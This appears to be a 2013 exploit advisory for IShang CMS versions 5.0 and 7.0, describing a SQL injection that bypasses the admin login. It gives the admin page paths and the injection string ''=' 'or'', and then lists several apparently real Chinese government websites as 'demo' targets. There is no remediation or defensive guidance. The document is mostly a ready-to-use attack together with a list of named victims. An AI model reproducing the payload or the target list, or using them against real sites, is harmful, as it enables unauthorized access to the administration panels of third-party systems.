IShang CMS versions 5.0 and 7.0 suffer from a remote SQL injection vulnerability that allows for authentication bypass.
03fdd395bba1e60ce62f2dcd137addac4dd66248609fa913aadb8aa2ac369f72
######################
# Exploit Title : IShang CMS Login Page Bypass Vulnerability
# Exploit Author : Adrian
# Vendor Homepage : http://www.ishang.net/
# Google Dork : Use Your Brain
# Date: 2013/12/28
# Tested On : Win8
# Software Link : http://www.ishang.net/
# Version : 7.0 / 5.0
######################
#*
# 1) http://site.com/[path]/admin/
# 2) http://site.com/[path]/mywebs/
#
# String For Bypass : '=' 'or'
#
# Demo:
#
http://www.qj12333.gov.cn/mywebs/
#
http://www.lasl.gov.cn/admin/
#
http://www.lajgj.gov.cn/admin/
#
http://fx.ahxf.gov.cn/admin/
#
http://gxsh.ahfeixi.gov.cn/admin/
#
http://sangang.ahfeixi.gov.cn/admin/
#
http://www.mglyj.gov.cn/admin/
#
######################
# discovered by : Adrian
######################**